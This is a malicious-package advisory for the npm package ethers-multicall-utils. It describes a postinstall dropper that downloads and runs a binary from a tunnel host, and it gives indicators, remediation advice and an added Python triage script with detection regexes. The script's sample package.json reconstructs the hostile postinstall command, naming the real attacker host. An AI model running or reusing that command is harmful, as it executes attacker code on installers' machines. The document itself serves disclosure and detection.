MAL-2026-4240

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ethers-multicall-utils/MAL-2026-4240.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4240
Aliases
  • GHSA-r83q-qx5h-cjqm
Published
2026-05-20T00:00:48Z
Modified
2026-05-26T06:02:18.099466738Z
Summary
Malicious code in ethers-multicall-utils (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (fe5e969b4ca41dbbd6ef1c04c12d48906ea4477b39493e766045effd4939d748)

On npm install, the package's postinstall script spawns node -e to run an inline child_process.execSync that curls a binary from rqnyz-2605-7280-7--2000-c51.run.pinggy-free.link/npm/-/binary/telemetry, saves it to the hidden path /tmp/.node-cache, chmod +x's it, and executes it in the background, swallowing errors via try/catch. The destination is an anonymous, ephemeral Pinggy free-tunnel host with no relation to the ethers / multicall ecosystem; the URL is unversioned, lacks an explicit scheme, and the fetched binary is opaque with no hash or signature verification. The package's advertised purpose (batching ethers RPC calls) does not require any binary download or telemetry executable. The package metadata reinforces malicious intent: the name ethers-multicall-utils mimics the legitimate ethers-multicall / @0xsequence/multicall libraries, the author is a placeholder (Web3 Developer Tools <dev@ethers-tools.dev>), and the declared repository github.com/ethers/ethers-multicall-utils does not exist. Installing this package executes attacker-controlled bytes on the installer's machine.

Source: ghsa-malware (c53a0db99f667c745b204d69826c00088b437fd873a9cdf32e417334d801755c)

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
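The amazon-inspector entry above spells out each step of the dropper (inline `node -e`, `child_process.execSync`, `curl` to an ephemeral tunnel host, a hidden file under /tmp, `chmod +x`, background execution, errors swallowed by try/catch), and the indicators block lists the tunnel domain and the tarball's sha512 SRI. The script below is an added triage example written for this page, not code from the package, OSV, GHSA or Amazon Inspector. It turns those steps into lifecycle-script heuristics and matches package-lock.json entries and on-disk tarballs against the page's indicators. Assumptions beyond the page: the tunnel-host list adds a few other free tunnel services besides pinggy, the "suspicious" threshold of three distinct heuristics is arbitrary, and the sample package.json and lock-file entries are constructed (the postinstall string is an approximation written from the description; it is only parsed, never executed).

```python
# Added triage helper for the install-time behaviour described in MAL-2026-4240.
# Not code from the package, OSV, GHSA or Amazon Inspector. It (1) flags npm
# lifecycle scripts matching the pattern in the amazon-inspector entry and
# (2) matches package-lock.json entries and tarballs against the page's indicators.
import base64
import hashlib
import json
import os
import re
import sys

# Indicators copied from this advisory's "indicators" and "versions" fields.
BAD_DOMAINS = {"rqnyz-2605-7280-7--2000-c51.run.pinggy-free.link"}
BAD_INTEGRITY = {"sha512-eWCqlKh+3Z43BqQNdL2XQeHiJTzaUk+D68PvLo7qICFQmZ6O0HYdY2/JBY0Dqy0ia0ElXyS5M8xh9HKUo9stmA=="}
BAD_PACKAGES = {("ethers-multicall-utils", "1.3.15")}

LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")

# One heuristic per step the advisory describes. The tunnel-host list goes
# beyond the page: pinggy is the host named here; the others are an assumption.
PATTERNS = [
    ("inline-node-eval", re.compile(r"\bnode\s+(?:-e|--eval)\b")),
    ("child-process-exec", re.compile(r"child_process|execSync|spawnSync")),
    ("remote-fetch", re.compile(r"\b(?:curl|wget)\b")),
    ("hidden-tmp-path", re.compile(r"/tmp/\.[\w.-]+")),
    ("make-executable", re.compile(r"chmod\s+\+x")),
    ("background-exec", re.compile(r"\s&(?:\s|['\"]|$)")),
    ("error-swallowing", re.compile(r"try\s*\{[^}]*\}\s*catch\s*\([^)]*\)\s*\{\s*\}")),
    ("ephemeral-tunnel-host", re.compile(r"\.(?:pinggy-free\.link|pinggy\.link|ngrok-free\.app|trycloudflare\.com)\b")),
]


def scan_scripts(pkg: dict) -> list:
    """Return (script, label) for every heuristic or IOC hit in lifecycle scripts."""
    hits = []
    for name in LIFECYCLE:
        body = (pkg.get("scripts") or {}).get(name)
        if not isinstance(body, str):
            continue
        hits += [(name, label) for label, rx in PATTERNS if rx.search(body)]
        hits += [(name, "ioc-domain:" + d) for d in BAD_DOMAINS if d in body]
    return hits


def verdict(pkg: dict, threshold: int = 3) -> str:
    """Known IOC => known-malicious; >= threshold distinct heuristics => suspicious."""
    labels = {label for _, label in scan_scripts(pkg)}
    if any(label.startswith("ioc-domain:") for label in labels):
        return "known-malicious"
    return "suspicious" if len(labels) >= threshold else "clean"


def scan_lockfile(lock: dict) -> list:
    """Match package-lock.json v2/v3 'packages' entries against name/version and SRI."""
    findings = []
    for path, entry in (lock.get("packages") or {}).items():
        if not isinstance(entry, dict) or not path:
            continue
        name = path.split("node_modules/")[-1]  # handles nested and @scoped paths
        if (name, entry.get("version")) in BAD_PACKAGES:
            findings.append(f"{path}: {name}@{entry['version']} is a listed malicious version")
        if entry.get("integrity") in BAD_INTEGRITY:
            findings.append(f"{path}: integrity matches the advisory's tarball SRI")
    return findings


def sri_sha512(data: bytes) -> str:
    """The Subresource-Integrity string npm stores for a tarball (sha512, base64)."""
    return "sha512-" + base64.b64encode(hashlib.sha512(data).digest()).decode()


def tarball_is_listed(path: str) -> bool:
    """True if an on-disk .tgz (e.g. recovered from ~/.npm/_cacache) hashes to the listed SRI."""
    with open(path, "rb") as fh:
        return sri_sha512(fh.read()) in BAD_INTEGRITY


def scan_tree(root: str) -> list:
    """Walk a checkout or node_modules tree; return (path, verdict) for non-clean package.json files."""
    out = []
    for dirpath, _, files in os.walk(root):
        if "package.json" in files:
            p = os.path.join(dirpath, "package.json")
            try:
                with open(p, encoding="utf-8") as fh:
                    v = verdict(json.load(fh))
            except (OSError, ValueError):
                continue
            if v != "clean":
                out.append((p, v))
    return out


# Constructed samples (not the real package's files). The postinstall string is an
# approximation written from the advisory's description; it is only parsed, never run.
MALICIOUS_PKG = {"name": "ethers-multicall-utils", "version": "1.3.15", "scripts": {"postinstall": (
    "node -e \"try{require('child_process').execSync('curl -s "
    "rqnyz-2605-7280-7--2000-c51.run.pinggy-free.link/npm/-/binary/telemetry -o /tmp/.node-cache"
    " && chmod +x /tmp/.node-cache && /tmp/.node-cache &')}catch(e){}\"")}}
BENIGN_PKG = {"name": "some-lib", "scripts": {"postinstall": "node scripts/build.js"}}
SAMPLE_LOCK = {"lockfileVersion": 3, "packages": {
    "": {"name": "my-dapp"},
    "node_modules/ethers-multicall-utils": {"version": "1.3.15", "integrity": next(iter(BAD_INTEGRITY))},
    "node_modules/ethers": {"version": "6.13.0", "integrity": "sha512-notTheListedOne=="},
}}

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for p, v in scan_tree(root):
        print(f"{v}: {p}")
    lock = os.path.join(root, "package-lock.json")
    if os.path.exists(lock):
        with open(lock, encoding="utf-8") as fh:
            for finding in scan_lockfile(json.load(fh)):
                print("lockfile:", finding)
```

Run it as `python3 triage.py /path/to/project`. The lock-file match works because package-lock.json stores the same `sha512-...` SRI string that the indicators block lists, so a project that pulled version 1.3.15 is identifiable without the tarball being present; `tarball_is_listed` covers the case where the .tgz itself is recovered from the npm cache. A heuristic-only "suspicious" verdict means read the script; an IOC hit means follow the ghsa-malware guidance above, treating the host as compromised and rotating secrets from a different machine.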

Database specific
{
    "malicious-packages-origins": [
        {
            "source": "ghsa-malware",
            "modified_time": "2026-05-22T02:43:00Z",
            "sha256": "c53a0db99f667c745b204d69826c00088b437fd873a9cdf32e417334d801755c",
            "id": "GHSA-r83q-qx5h-cjqm",
            "ranges": [
                {
                    "type": "SEMVER",
                    "events": [
                        {
                            "introduced": "0"
                        }
                    ]
                }
            ],
            "import_time": "2026-05-22T03:24:54.644961844Z"
        },
        {
            "versions": [
                "1.3.15"
            ],
            "modified_time": "2026-05-20T00:00:48Z",
            "sha256": "321a360a9a275e7ed673033dcf3592d65de1832436ed55beee42971aa8e973bd",
            "id": "IN-MAL-2026-003309",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:23.898021147Z"
        },
        {
            "versions": [
                "1.3.15"
            ],
            "modified_time": "2026-05-20T00:00:48Z",
            "sha256": "fe5e969b4ca41dbbd6ef1c04c12d48906ea4477b39493e766045effd4939d748",
            "id": "IN-MAL-2026-003308",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:23.801461702Z"
        }
    ]
}
References
Credits

Affected packages

npm / ethers-multicall-utils

Package

Name
ethers-multicall-utils
Purl
pkg:npm/ethers-multicall-utils

Affected ranges

Type
SEMVER
Events
Introduced
0 (unknown introduced version: all previous versions are affected)

Affected versions

1.*
1.3.15

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ethers-multicall-utils/MAL-2026-4240.json"
indicators
{
    "domains": [
        "rqnyz-2605-7280-7--2000-c51.run.pinggy-free.link"
    ],
    "package_integrity": [
        {
            "filename": "ethers-multicall-utils-1.3.15.tgz",
            "hashes": {
                "sha512_sri": "sha512-eWCqlKh+3Z43BqQNdL2XQeHiJTzaUk+D68PvLo7qICFQmZ6O0HYdY2/JBY0Dqy0ia0ElXyS5M8xh9HKUo9stmA==",
                "sha1": "432ef3341854be36dc219a13f191c249ca11f730"
            }
        }
    ],
    "evidence_files": [
        {
            "path": "package.json",
            "tlsh": "1c011090d4284f7348cc0fa6185c71c0b0628c038a80b848f347816ec38f76e86fd99e",
            "sha256": "4c155819c9c8583183416f927c6a749a16b62a25f1a0cbbbf78792987a2a7cbe"
        }
    ]
}